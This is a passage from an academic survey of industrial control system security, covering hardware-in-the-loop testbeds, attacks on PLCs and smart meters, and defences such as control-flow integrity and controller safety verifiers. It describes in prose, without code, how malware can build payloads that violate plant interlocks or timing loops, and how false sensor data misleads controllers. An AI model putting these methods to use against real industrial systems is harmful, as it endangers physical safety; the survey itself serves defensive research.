(IDSs) can assist in continuously moni-toring network traffic and discover potential threats andvulnerabilities. C. ICS Testbeds The assessment environment, i.e., the testbed, effects all the stages of the assessment methodology. Assessmentmethodologies that include the production environmentor testing individual components of the ICS are not rele-vant. Although these methodologies are effective for ITsystems, uniquely-ICS nature of using data to manipu-late physics makes these ap proaches inherently hazard- ous. Therefore, we focus on lab-based ICS testbeds. A HIL testbed offers numerous benefits by balancing accu-racy and feasibility. In addition, HIL testbeds can beused to train employees and ensure interoperability ofthe diverse components used in the ICS. The cyber physical nature of ICSs presents several challenges in the design and operation of an ICS testbed.The testbed must be able to model the complex behavior of the ICS for both operation and nonoperation condi- tions. It should address scaling since the testbed is ascaled down model of the actual physical ICS. Further-more, the testbed must accurately represent the ICS inorder to support the protocols and standards as well asto generate accurate data. It is also important for thetestbed to capture the interaction between legacy and Fig. 5. (a) Real ICS environment versus (b) HIL simulation of ICSs. 1044 Proceedings of the IEEE |V o l .1 0 4 ,N o .5 ,M a y2 0 1 6McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. modern ICS. This interaction is important for both se- curity assessment and compatibility testing of the ICS. Numerous other factors should be considered when de-signing an ICS testbed including flexibility, interfacewith IT systems, configuration settings, and testing forextreme conditions. Assessment of ICS using software-only testbed and techniques is not frequently adopted. Software modelsand simulations cannot recreate real-world conditions since they include only one layer of the complex ICS ar- chitecture. Furthermore, the software models cannot in-clude every possible cyber physical system state of theICS [48]. Software-only testbeds are also limited by thesupported hardware. Finally, the limitations of the com-putational features supported by the software simulatormight introduce delays, simplify assumptions, and usesimple heuristics in the simul ator engine (e.g., theoreti- cal implementation of network protocols). Finally, in most cases, a software-only testbed gives the users afalse sense of security regarding the accuracy of thesimulation results. On the other hand, software-only as-sessment is advantageous in that one can study the be-havior of a system without building it. Scilab and Scicosare two open-source software platforms for design, sim-ulation, and realization of ICSs [49], [50]. It is clear that an ICS testbed requires real hardware in the simulation loop. Such HIL simulation symbioti-cally relates cyber and physical components [51]. A HILtestbed can simulate real-world interfaces including in-teroperable simulations of control infrastructures, dis-tributed computing applications, and communicationnetworks protocols. 1) Security Objectives of HIL Testbeds: The primary ob- jective of HIL testbeds is to guide implementation of cy-bersecurity within ICSs. In addition, HIL testbeds areessential to determine and resolve security vulnerabil-ities. The individual components of an appropriatetestbed should capture all the ICS layers, and the interac-tions are shown in Fig. 3. Equipment and network vulnerabilities can be tested in a protected environment that can facilitate multiple types of ICS scenarios highlighting the several layers of the ICSarchitecture. For instance, the cybersecurity testbed devel-oped by NIST covers several ICS application scenarios[52]. The Tennessee Eastman scenario covers the continu-ous process control in a chemical plant. The robotic assem-bly scenario covers the discrete dynamic processes withembedded control. The enclave scenario covers wide area industrial networks in an ICS such as SCADA. 2) Benefits of a HIL Assessment Methodology: The HIL assessment methodology has the following advantages: flexibility: HIL systems provide reconfigurable ar- chitectures for testing several ICS applicationscenarios (incorporating legacy and modern equipment); simulation: ICS phenomena are simulated faster than complex physical ICS events; accuracy: HIL simulators provide results compa- rable in terms of accuracy with the live ICSenvironment; repeatability: the controlled settings in the testbed increase repeatability; cost effectiveness: the combination of hardware HIL software reduces the implementation costsof the testbed; safety: HIL simulation avoids the hazards present when testing in a live ICS setting; comprehensiveness: it is often possible to assess ICS scenarios over a wider range of operatingconditions; modularity: HIL testbeds facilitate linkages with other interfaces and testbeds, integrating multi-ple types of control components; network integration: protocols and standards can be evaluated creating an accurate map of net-worked units and their connection communica-tion links; nondestructive test: destructive events can be evaluated (e.g., aurora generator test [53]) with- out causing damage to the real system; hardware security: HIL testbed allows one to study the hardware security of an ICS which hasbecome a major concern over the past decade 7(e.g., side-channel and firmware attacks [44]). 3) Example ICS Testbeds: Over 35 smart grid testbeds have been developed in the United States [54]. ENEL SPA testbed analyzes attack scenarios and their impacton power plants [55]. It includes a scaled down physicalprocess, corporate and control networks, DMZs, PLCs,industrial standard software, etc. The Idaho NationalLaboratories (INL) SCADA Testbed is a large-scaletestbed dedicated to ICS cybersecurity assessment, stan-dards improvements, and training [56]. The PowerCyber testbed integrates communication protocols, industry control software, and field devices combined with virtua-lization platforms, real-time digital simulators (RTDSs),and ISEAGE WAN emulation in order to provide an ac-curate representation of cyber physical grid interdepen-dencies [57]. Digital B ond s Project Basecamp demonstrates the fragility and insecurity of SCADA andDCS field devices, such as PLCs and RTUs [58]. New York University (NYU) has developed a smart grid testbed to model the operation of circuit breakers anddemonstrate firmware modification attacks on relay con-trollers [44]. Many hybrid laboratory-scale ICS testbedsexist in research centers and universities [54]. Besideslaboratory-scale ICS testbeds with real equipment, manyvirtual testbeds are also being developed able to create Vol. 104, No. 5, May 2016 | Proceedings of the IEEE 1045McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. ICS components including virtual devices and process simulators [59]. Summarizing, given that many ICS attacks exploit vulnerabilities in one or more layers of an ICS, HIL ICStestbeds are becoming standard for security assessment,allowing development and testing of advanced securitymethods. Additionally, HIL ICS testbeds have been quan-titatively shown to produce results close to real-worldsystems. III. ATTACKS ON ICSs An important part of the assessment process is the iden- tification of vulnerabilities in the ICS under test. In thissection, we present the current and emerging threatlandscapes for ICSs. A. Current ICS Threat Landscape ICSs are vulnerable to traditional computer viruses [60] [62], remote break-ins [63], insider attacks [64],and targeted attacks [65]. Industries affected by ICS at-tacks include nuclear power and refinement of fissile ma-terial [62], [65], transportation [63], [66], electric powerdelivery [67], manufacturin g [60], building automation [64], and space exploration [61]. One class of attacks against ICS involves compromis- ing one or more of its components using traditional at-tacks, e.g., memory exploits, to gain control of thesystems behavior, or access sensitive data related to theprocess. We consider three classes of studies on ICSvulnerabilities. The first considers studies of the secu-rity and security readiness of ICS systems and theiroperators. The second class considers security vulnera- bilities in PLCs. The third class considers vulnerabil- ities in sensors, in this case, focusing on smart electricmeters, an important component of the smart gridinfrastructure. 1) ICS Security Posture: There have been studies of the ICS security posture [68] and the conclusion is thatthere is substantial room for improvement. First, it was f o u n dt h a tI C S sf r e q u e n t l yr e l yo ns e c u r i t yt h r o u g ho b - scurity, due to their history of being proprietary systemsisolated from the Internet. However, use of commodityOS (e.g., Microsoft Windows OS) and open, standardnetwork protocols, have left ICS open not only to mali-cious attacks, but also to coincidental infiltration by In-ternet malware. For example, the slammer worminfected machines belonging to an Ohio nuclear power generation facility. These studies also showed a signifi- cant rise in ICS cybersecuri ty incidents; while only one incident was reported in 2000, ten incidents were re-ported in 2003. Penetration tests of over 100 real-worldICSs over the course of ten years, with emphasis onpower control systems, corroborate these findings [69].Besides identifying vulnerab ilities throughout the ICS,the study shows that in most cases, these ICSs are at least a year behind the standard patch cycle. In some cases, the DMZ separating the ICS from the corporatenetwork had not been updated in years leaving DoS at-tacks trivial. For example, in their evaluation of a net-work connected PLC, it was found that ping floodingwith 6-kB packets was sufficient to render the PLC inop-erable, causing all state to be lost and forcing it to bepower cycled. Another hurdle in improving ICS security are three commonly held myths [70]: 1) security can be achievedthrough obscurity; 2) blindly deploying security tech-nologies improves security; the naive application offirewalls, cryptography, a nd antivirus software often leaves system operators with a false sense of security;and 3) standards compliance yields a secure system;the North-American Energy Reliability Corporations Cy- ber Infrastructure Protection standards [71] have been criticized for giving a false sense of security [72]. 2) Attacks on PLCs: PLCs monitor and manipulate the state of a physical system. A popular Siemens PLC wasshown to have vulnerabilities. The ISO-TSAP protocolused by these PLCs can implement a replay attack due tolack of proper session freshness [73]. It was also possible to bypass the PLC authentication, sufficient to upload payloads as described in Section III-B, and to execute ar-bitrary commands on the PLC. The Siemens PLCs usedin correctional facilities have vulnerabilities allowing ma-nipulation of cell doors [74]. 3) Attacks on Sensors: Another critical element in an ICS are the sensors that gather data and relay it back to the control units. Consider smart meters that are widely a deployed element of the evolving smart electric grid[75]. A smart meter has the same form factor as a tradi-tional analog electric meter with a number of enhancedfeatures: time of use pricing [76], automated meterreading, power quality monitoring, and remote powerdisconnect. Security assessment of a real-world smartmetering system considered energy theft by tampered measurement values [77]. The system under test allowed for undetectable tampering of measurement values both in the meter s persistent storage, as well as in flight, dueto a replay attack against the meter-to-utility authentica-tion scheme. A follow-up s tudy examined meters from multiple vendors and found vulnerabilities allowing for asingle-packet denial of service attack against an arbitrarymeter, and full control of the remote disconnect switch enabling a targeted disconnect of the service to a customer [78]. B. Emerging Threats Here we introduce two new directions for attacks on ICSs. The first of these constructs payloads targeting anICS that an adversary may not have full access to. The 1046 Proceedings of the IEEE | Vol. 104, No. 5, May 2016McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. second class of attacks manipulate sensor inputs to mis- guide the decisions made by the PLCs. 1) Payload Construction: O n et y p eo fa t t a c k sa i m st o gather intelligence about the victim ICS. For example,the Duqu worm seems to have gathered informationabout victim systems [79], before relaying it to commandand control servers. The other type of attacks against ICSaims to influence the physical behavior of the victim system. Best known example of such an attack is the Stuxnet worm, which manipulated the parameters of aset of centrifuges used for uranium enrichment. Such anattack has two stages: the compromise and the payload.Traditionally, once an adversary has compromised an in-formation system, delivering a preconstructed payload isstraightforward. This is because the attacker usually hasa copy of the software being attacked. However, for ICSs, this is not necessarily the case. Depending on the type of attack the adversary mounts, construction of thepayload may be either error prone or nearly impossible.A payload is either indiscriminate or targeted. An indiscriminate payload performs random attacks causing malicious actions within the machinery of a vic-tim ICS. There are several ways malware can automati-cally construct indiscriminate payloads upon gaining access to one or more of the victim ICS PLCs [80]. The assumption here is that if the malware is able to write tot h eP L Cc o d ea r e a ,t h e ni tm u s ta l s ob ea b l et or e a dfrom the PLCs code area. 1Given the ability to read the PLC code several methods may be used to construct in-discriminate payloads. 1) The malware infers basic safety properties known as interlocks [82] and generates a payload which sequentially violates as many safety prop- erties as possible. 2) The malware identifies the main timing loop in the system. Consider the example of a trafficlight, where the main loop ensures that eachcolor of light is active in sequence for a specificperiod of time. The malware can then constructa payload that violates the timing loop, e.g., by allowing certain lights to overlap. 3) In the bus enumeration technique, the malware uses the standardized identifiers such as Profi-bus IDs to find specific devices within a victimsystem [83]. While these indiscriminate payload construction methods are generic, they have a number of shortcom-ings. First, in the case where the payload is unaware of the actual devices in the victim ICS, one cannot guaran- tee that the resulting payload will cause damage (orachieve any other objective). Second, they cannotguarantee that the resulting payload will be stealthy. Thus, the malicious behavior may be discovered before it becomes problematic. Finally, there is no guarantee thata payload can be constructed at all. If the malware is un-able to infer safety properties, timing loops, or the typesof physical machinery present, then it is not possible toconstruct a payload that exploits them. A targeted payload, on the other hand, attempts to achieve a specific goal within the physical system, such as causing a specific device to operate beyond its safe limits. The alternative is a targeted payload where theadversary is able to arbitrarily inspect the system underattack, i.e., he has a copy of the exploited software. Forautonomous, malware-driven attacks against ICS, this isnot the case. Embedded controllers used in ICS may beair-gapped, meaning that once malware infects them, itmay no longer be able to contact its command and con- trol servers. Additionally, possessing the control logic for a given PLC may not be sufficient to analyze the systemmanually, as the assembly-language-like control logicdoes not reveal which physical devices are controlled bywhich program variables. Malware can construct such atargeted payload against a compromised ICS [84]. Theyassume that the adversary launching the malware has im-perfect knowledge about the physical machinery in the ICS, and is also mostly aware of their interactions. How- ever, the adversary lacks two key pieces of information:1) the complete and precise behavior of the ICS; and2) the mapping between the memory addresses of thevictim PLC and the physical devices in the ICS. Thismapping is important, as often the variable names in aPLC code reveal nothing about the devices theycontrol. Assuming that the attacker can encode his limited knowledge of the victim plant into a temporal logic, aprogram analysis tool called SABOT can analyze the PLCcode, and map behaviors of the memory addresses in thecode to those in the adversary s temporal logic descrip-tion of the system. The results show that by carefullyconstructing the temporal logic description of the sys-t e m ,t h ea d v e r s a r yc a np r o v i d et h em a l w a r ew i t he n o u g h information to construct a targeted payload against most ICS devices. These advances in payload generation defeat one of the main forms of security through obscurity: the inac-cessibility and low-level nature of PLC code. The abilityto generate a payload for a system without ever seeing itscode represents a substantial lowering of the bar for ICSattackers, and thus should be a factor in any assessment methodology. 2) False Data Injection (FDI): In an FDI attack, the ad- versary selects a set of sensors that feed into one ormore controllers. The adversary then supplies carefullycrafted malicious values to these sensors, thus achievinga desired result from the controller. For example, if the 1This assumption was confirmed in a study of PLC security mea- sures placed as an ancillary section in an evaluation of a novel security mechanism [81]. The conclusion was that PLC access control policies are all or nothing, meaning that write access implies read access. Vol. 104, No. 5, May 2016 | Proceedings of the IEEE 1047McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. supplied malicious values tell the controller that a tem- perature is becoming too low, it will increase the setting on a heating element, even if the actual temperature isfine. This will then lead to undetected overheating. The earliest FDI attack targeted power system state estimation [85]. State estimation is an important step indistributed control systems, where the actual physicalstate is estimated based on a number of observables.Power system state estimation determines how electric load is distributed across various high-voltage lines and substations within the power transmission network.Compromising a subset of phasor measurement units(PMUs) can result in incorrect state estimation. Thiswork addressed two questions: 1) Which sensors shouldbe compromised, and how few are sufficient to achievethe desired result? 2) How can the maliciously craftedsensor values bypass the error correction mechanisms built into the state estimation algorithm? By compromis- ing only tens of sensors (out of hundreds or thousands)it is possible to produce inaccurate state estimations inrealistic power system bus topologies. FDI attacks on Kalman-filtering-based state estima- tion has been reported in [86]. Kalman filters are amore general form of state estimation than the linear,direct current (dc) system model. The susceptibility of a Kalman-filter-based state estimator to FDI attacks de- pends on inherent properties of the designed system[86]. The system is only guaranteed to be controllablevia FDI attack if the underlying state transition matrixcontains an unstable eigenvalue, among other condi-tions. This has important implications not only for at-tacks, but also for defenses against FDI attacks, since asystem lacking an unstable eigenvalue may not be per- fectly attacked. IV.MITIGATING ATTACKS ON ICSs In this section, we review the following ICS defenses: software-based mitigation, secure controller architecturesto detect intrusions, and theoretical frameworks to un-derstand the limits of mitigation. A. Software Mitigations Embedded systems software is programmed using na- tive (unsafe) programming languages such as C or assem-bly language. As a consequence, it suffers from memoryexploits, such as buffer overflows. After gaining controlover the program flow the adversary can inject maliciouscode to be executed (code injection [87]), or use existing pieces (gadgets) that are already residing in program memory (e.g., in linked libraries) to implement the de-sired malicious functionalit y (return-oriented program- ming [88]). Moreover, return-oriented programming isTuring complete, i.e., it allo ws an attacker to execute ar- bitrary malicious code. The latter attacks are often re-ferred to as code-reuse attacks since they use benigncode of existing ICS softwar e. Code-reuse attacks are prevalent and are applicable to a wide range of comput- ing platforms. The Stuxnet is known to have used code-reuse attacks [89]. Defenses against these attacks focus on either the en- forcing control-flow integrity (CFI) or randomizing thememory layout of an application by means of fine-grained code randomization. We elaborate on these twodefenses. These defenses assume an adversary who is able to overwrite control-flow information in the data area of an application. There is a large body of work thatprevents this initial overwrite; a discussion of these ap-proaches is beyond the scope of this paper. 1) Control-Flow Integrity: This defense technique against code-reuse ensures that an application only exe-cutes according to a predetermined control-flow graph (CFG) [90]. Since code injection and return-oriented pro- gramming result in a deviation of the CFG, CFI detectsand prevents the attack. CFI can be realized as a compilerextension [91] or as a binary rewriting module [90]. CFI has performance overhead caused by control- flow validation instructions. To reduce this overhead, anumber of proposals have been made: kBouncer [92],ROPecker [93], CFI for COTS binaries [94], ROPGuard [95], and CCFIR [96]. These schemes enforce so-called coarse-grained integrity checks to improve performance.For instance, they only constrain function returns to in-structions following a call instruction rather than checkingthe return address against a list of valid return addressesheld on a shadow stack. Unfortunately, this tradeoff be-tween security and performance allows for advancedcode-reuse attacks that stitch together gadgets from call- preceded sequences [97] [100]. Some runtime CFI tech- niques leverage low-level hardware events [101] [103].Another host-based CFI check injects intrusion detectionfunctionality into the monitored program [104]. Until now, the majority of research on CFI has focused on software-based solutions. However, hardware-basedCFI approaches are more efficient. Further, dedicatedhardware CFI instructions allow for system-wide CFI pro- tection using these instructions. The first hardware-based CFI approach [105] realized the original CFI proposal[90] as a CFI state machine in a simulation environmentof the Alpha processor. HAFIX proposes hardware-basedCFI instructions and has been implemented on real hard-ware targeting Intel Siskiyou Peak and SPARC [106],[107]. It generates 2% performance overhead acrossdifferent embedded benchmarks by focusing on pre- venting return-oriented programming attacks exploiting function returns. Remaining Challenges : Most proposed CFI defenses focus on the detection and prevention of return-oriented programming attacks, but do not protect againstreturn-into-libc attacks. This is only natural, becausethe majority of code-reuse attacks require a few 1048 Proceedings of the IEEE | Vol. 104, No. 5, May 2016McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. return-oriented gadgets to initialize registers and prepare memory before calling a system call or critical function. However, Schuster et al. [108] have demonstrated that code-reuse attacks based on only calling a chain of vir-tual methods allow arbitrary m alicious program actions. In addition, it has been demonstrated that pure return-into-libc attacks can achieve Turing completeness [109]. Detecting such attacks is challenging: modern programslink to a large number of libraries, and require dangerous API and system calls to operate correctly [97]. Hence, for these programs, dangerous API and system calls arelegitimate control-flow target s for indirect and direct call instructions, even if fine-grained CFI policies are en-forced. In order to detect code-reuse attacks that exploitthese functions, CFI needs to be combined with addi-tional security checks, e.g., dynamic taint analysis andtechniques that perform argum ent validation. Developing such CFI extensions is an important future research direction. 2) Fine-Grained Code Randomization: Aw i d e l yd e - ployed countermeasure against code-reuse attacks is therandomization of the applications memory layout. Thekey idea here is one of software diversity [110]. The keyobservation is that an adversary typically attempts to compromise many systems using the same attack vector. To mitigate this attack, one can diversify a program im-plementation into multiple and different semanticallye q u i v a l e n ti n s t a n c e s[ 1 1 0 ] .T h eg o a li st of o r c et h ea d v e r -sary to tailor the attack vector for each software instance,making the attack prohibitive. Different approaches canbe taken for realizing software diversity, e.g., memoryrandomization [111], [112], based on a compiler [110], [113], [114], or by binary rewriting and instrumentation [115] [118]. A well-known instance of code randomization is ad- dress space layout randomization (ASLR) which random-izes the base address of shared libraries and the mainexecutable [112]. Unfortunately, ASLR is often bypassedin practice due to its low randomization entropy andmemory disclosure attacks which enable prediction of code locations. To tackle this limitation, a number of fine-grained ASLR schemes have been proposed [115] [120]. The underlying idea is to randomize the codestructure, for instance, by shuffling functions, basicblocks, or instructions (ideally for each program run[117], [118]). With fine-grained ASLR enabled, an adver-sary cannot reliably determine the addresses of interest-ing gadgets based on disclosing a single runtime address. However, a recent just-in-time return-oriented pro- gramming (JIT-ROP) attack, circumvents fine-grained ASLR by finding gadgets and generating the return-oriented payload on the fly [121]. As for any other real-world code-reuse attack, it only requires a memorydisclosure of a single runti me address. However, unlike code-reuse attacks against ASLR, JIT-ROP only requiresthe runtime address of a valid code pointer, without knowing to which precise code part or function it points to. Hence, JIT-ROP can use any code pointer such as re-turn addresses on the stack to instantiate the attack.Based on the leaked address, JIT-ROP can disclose thecontent of multiple memory pages, and generates thereturn-oriented payload at runtime. The key insight ofJIT-ROP is that a leaked code pointer will reside on a4-kB aligned memory page. This can be exploited leveraging a scripting engine (e.g., JavaScript) to deter- mine the affected page s start and end address. After-wards, the attacker can start disassembling therandomized code page from its start address, and identifyuseful return-oriented gadgets. To tackle this class of code-reuse attacks, defenses have been proposed [122] [124]. Readactor leverages ahardware-based approach to enable execute-only memory [124]. For this, it exploits Intel s extended page tables to conveniently mark memory pages as nonexecutable. Ina d d i t i o n ,a nL L V M - b a s e di n s t r u m e n t e dc o m p i l e r1 )p e r -mutes function; 2) strictly separates code from data; and3) hides code pointers. As a consequence, a JIT-ROP at-tacker can no longer disassemble a page (i.e., the codepages are set to nonreadable). In addition, one cannotabuse code pointers located on the application s stack and heap to identify return-oriented gadgets, since Read- actor performs code pointer hiding. Remaining Challenges : CFI provides provable security [125]. That is, one can formally verify that CFI enforce-ment is sound. In particular, the explicit control-flowchecks inserted by CFI into an application provide strongassurance that a program s control flow cannot be arbi-trarily hijacked by an adversary. In contrast, code ran- domization does not put any restriction on the program s control flow. In fact, the attacker can provide any validm e m o r ya d d r e s sa sa ni n d i r e c tb r a n c ht a r g e t .A n o t h e rrelated problem of protection schemes based on coderandomization are side-channel attacks [126], [127].These attacks exploit timing and fault analysis sidechannels to infer randomization information. Recently,several defenses started to combine CFI with code ran- domization. For instance, Mohan et al. [128] presented opaque CFI (O-CFI). This solution leverages coarse-grained CFI checks and code randomization to preventreturn-oriented exploits. For this, O-CFI identifies a unique set of possible target addresses for each indi-rect branch instruction. Afterwards, it uses the per-indirect branch set to restrict the target address of theindirect branch to only its minimal and maximal mem- bers. To further reduce the set of possible addresses, it ar- ranges basic blocks belonging to an indirect branch setinto clusters (so that they are located nearby to each other),and also randomizes their location. However, O-CFI re-lies on precise static analysis. In particular, it staticallydetermines valid branch addresses for return instructionswhich typically leads to coarse-grained policies. Vol. 104, No. 5, May 2016 | Proceedings of the IEEE 1049McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. Nevertheless, Mohan et al. [128] demonstrate that com- bining CFI with code randomization is a promising re- search direction. B. Novel/Secure Control Architectures In this section, we consider mitigations for the prob- lem raised in Section III-B1. The threat here is that anadversary may tamper with a controller s logic code, thussubverting its behavior. This can be generalized to the notion of an untrusted controller. We consider four n o v e la r c h i t e c t u r e sf o rt h i sp r o b l e m :T S V ,at o o lf o rs t a t -ically checking controller code; C 2, a dynamic reference monitor for a running controller; S3A, a controller archi-tecture that represents a middle ground between TSVand C 2; and finally, an approach for providing a trusted computing base (TCB) for a controller so that PLCs maydependably enforce safety properties on themselves. 1) Trusted Safety Verifier (TSV) [81]: As previously dis- cussed, one method for tampering with an ICS process isto upload malicious logic to a PLC. This was demon-strated by the Stuxnet attack. TSV prevents uploadingof malicious control logic by statically verifying thatlogic ap r i o r i [81]. TSV sits on an embedded devices next to a PLC and intercepts all PLC-bound code and statically verifies it agains tas e to fd e s i g n e rs u p p l i e d safety properties. TSV does this in a number of steps.First, the control logic is symbolically executed to pro-duce a symbolic scan cycle. A symbolic scan cycle rep-resents all possible single-scan cycle executions of thecontrol logic. It then finds feasible transitions betweensubsequent symbolic scan cycles to form a temporal exe-cution graph (TEG). The TEG is then fed into a model checker which will verify that a set of linear temporal logic safety properties hold under the TEG model. Ifthe control logic violates any safety property, the modelchecker will return a counterexample input that wouldcause the violation, and the control logic would beblocked from running on the PLC. The main drawbackof TSV is that often the TEG is a tree structure ofbounded depth. Thus, systems beyond a certain com- plexity cannot be effectively checked by TSV in a rea- sonable amount of time. 2)C 2Architecture [129]: It provides a dynamic refer- ence monitor for sequential and hybrid control systems.Like TSV, C 2enforces a set of engineer-supplied safety properties. However, enforcement in C2is done at run- time, by an external module positioned between a PLC a n dt h eI C Sh a r d w a r ed e v i c e s .A tt h ee n do fe a c hP L C scan cycle, a new set of control signals are sent to the ICSdevices. C 2will check these signals, along with the cur- rent ICS state, against the safety properties. Any unsafemodifications of the plant state are denied. If at any step,an attempted control signal is denied by C 2, it will enact one of a number of deny disciplines to deal with thepotentially dangerous operation. One of the main results from C2evaluation was that all deny disciplines should support notifying the PLC of the denial, so that it knowsthe plant did not receive the control signal. A key short-coming of C 2is that it can only detect violations immedi- ately before they occur. What is preferable is a systemthat can give advanced warnings, like in the TSV s staticanalysis, but can work for complex ICS, like C 2. 3) Secure System Simplex Architecture (S3A) [130]: Sim- ilar to how TSV requires a copy of the control logic, S3Arequires the high-level syste m control flow and execution time profiles for the system under observation. Similarto how C 2performs real-time monitoring, S3A aims to detect when the system is approaching an unsafe state.However, different from C 2, S3A aims to give a deter- ministic time buffer before potentially entering the un- safe state [131]. While S3A has the advantage of more advanced detection, it cannot operate on arbitrarily com-plex systems like C 2can. However, it is appropriate for more complex systems than TSV. Remaining Challenges :I nt h i sr e v i e wo fT S V ,C2,a n d S3A, we see a tradeoff forming: complexity of the moni-tored system versus amount of advanced warning. TSVsits at one end of this spectrum, offering the most ad- vanced warning for systems of bounded complexity, while C 2sits at the other end, offering last second detec- tion of unsafe states on arbitrarily complex systems. TheS3A approach represents a compromise between the two,h o w e v e r ,t h em o r ec o m p l e xt h es y s t e mi s ,t h em o r ed e -tailed the control flow and timing information fed toS3A must be, while in the future, computational powerfor verification may be substantial enough to allow for full TSV analysis of arbitrarily complex systems. How- ever, for current, practical solutions, this is not a reason-able assumption. Part of the reason none of the existing architectures can win both ends of the tradeoff is that they all existoutside the PLC. This also adds significant cost and com-plexity, as they must be physically integrated with an ex-isting control system. An alternative approach is to construct future PLCs to provide a minimal trusted com- puting base (TCB). One such TCB with the goal of re-stricting the ability to manipulate physical machinery toa small set of privileged code blocks within the PLCmemory is proposed in [132]. This TCB is not itselfaware of the ICS physical safety properties. Instead, thegoal of this TCB is to protect a privileged set of codeblocks that are able to affect the plant, i.e., via control signals. The privileged cod e blocks then contain the safety properties. Thus, C 2or S3A-like checks are done from within these blocks. This approach has the addedbenefit that a TSV-like verification of safety properties int h ep r i v i l e g e db l o c k si ss u b s t antially simpler than verify- ing an entire system, thus allo wing for a static analysis of more complex system than TSV. 1050 Proceedings of the IEEE |V o l .1 0 4 ,N o .5 ,M a y2 0 1 6McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. C. Detection of Control and Sensor Injection Attacks When considering attacks against ICS, there are two i m p o r t a n tc h a n n e l st h a tm u s tb ec o n s i d e r e d :t h ec o n t r o lchannel and the sensor channel. A control channel attackcompromises a computer, a controller, or individualupstream from the physical process. The compromisedentity then injects malicious commands into the system.A sensor channel attack corrupts sensor readings coming from the physical plant in order to cause bad decision making by the controllers receiving those sensorreadings. 2In this section, we review detection of control channel attacks and FDI. Techniques for control channelattacks inherit from the existing body of work in networkand host intrusion detection, whereas FDI detectionstems largely from the theory of state estimation andcontrol. 1) Detecting Control Channel Attacks: As u r v e yo f SCADA intrusion detection between 2004 and 2008 canb ef o u n di n[ 1 3 3 ] .I tp r e s e n t sat a x o n o m yi nw h i c hd e -tection systems are categorized based on the following. Degree of SCADA specificity: How well does the solution leverage some of the unique aspects ofSCADA systems? Domain: Does the solution apply to any SCADA system, or is it restricted to a single domain, e.g.,water. Detection principle: What method is used to categorize events: behavioral, specification,anomaly, or a combination? Intrusion-specific: Does the solution only address intrusions, or is it also useful for fault detection? Time of detection: Is the threat detected and reported in real time, or only as an offlineoperation? Unit of analysis: Does the solution examine net- work packets, API calls, or other events? We find that among the categorized systems there are some deficiencies. First, they lack a well-defined threatmodel. Second, they do not account for the degree of heterogeneity found in real-world ICS, e.g., use of multi- ple protocols. Finally, the proposed systems were not suf-ficiently evaluated for false positives, and insufficient strategies for dealing with false positives were given. We review recent work that aims at greater feasibility [134]. In this approach, a specification is derived fort r a f f i cb e h a v i o ro v e rs m a r tm e t e rn e t w o r k s ,a n df o r m a lverification is used to ensure that any network trace conforming to the specification will not violate a given security policy. The specification is formed based on:1) the smart meter protocols (in this case, the ANSI C12family); 2) a system model consisting of state machinesthat describe a meter s lifetime, e.g., provisioning,normal operation, error conditions, etc., as well as the network topology; and 3) a set of constraints on allowed behavior. An evaluation of a prototype implementationshowed that no more than 1.6% of CPU usage wasneeded for monitoring the specification at meters. Onepotential limitation of this approach is the need for ex-pert-provided information in the form of the systemmodel and constraints on allowed behavior. An alternative approach, which is not dependent on specifications, is given in [135]. This solution builds a model of good behavior through observation of threetypes of quantities visible to PLCs: sensor measurements,control signals, and events such as alarms. The behavioralmodel uses autoregression to predict the next systemstate. To avoid low-and-slow attacks that autoregressionmay not catch, upper and lower Shewart control limitsare used as absolute bounds on process variables that may not be crossed. Their evaluation on one week of network traces from a prototype control system showed that mostnormal behaviors were properly modeled by the autore-gression. There were, however, several causes of devia-tions including nearly constant signals that occasionallydeviated briefly before returning to their prior constantvalue, and a counter variable that experienced a delayedincrement. Such cases would represent false positives for the autoregression model, but would not necessarily trip the Shewart control limits. 2) Detecting FDI: While control channel attacks di- rectly target controllers with malicious commands, FDIattacks can be more subtle, as they used forged sensordata to cause the controller to make misguided decisions.Detection of FDI attacks is thus deeply rooted in the ex- isting discipline of state estimation discussed earlier. This will require a) a measurement model that relates themeasured quantity to the physical value that caused it,i.e., heat propagation; and b) an error detection methodto allow for faulty measurements to be discarded. We described one attack against power grid state esti- mation in which estimation errors could be caused bytampering with a relatively small number of PMUs [85]. In one approach to detecting such an attack, one can use a small, strategically selected set of tamper-resistantmeters to provide independent measurements [136].These out-of-band measurements are used to determinethe accuracy of the remaining majority of measure-ments contributing to the state estimation. In a second approach [137], two security indices are computed for a given state estimator. The first index measures how well the state estimator s bad data detec- tor can handle attacks where the adversary is limited to afew tampered measurements. The second index measureshow well the bad data detector can handle attacks wherethe adversary only makes small changes to measurementmagnitudes. Along with the grid topology information,these indices can be useful in determining how to 2More information about FDI can be found in Section III-B2. Vol. 104, No. 5, May 2016 | Proceedings of the IEEE 1051McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. allocate security functionality such as retrofitted encryp- tion to various measurement devices. The third approach differs from the above two in that i td o e sn o ta t t e m p tt os e l e c tas e to fm e t e r sf o rs e c u r i t yenhancements, but instead, places weights on the gridtopology to reflect the trustworthiness of various PMUs[138]. The trust weights are integrated to a distributedKalman filtering algorithm to produce a state estimationthat more accurately reflects the trustworthiness of the individual PMUs. In the evaluation of the distributed Kalman filters, it was found that they converged to thecorrect state estimate in approximately 20 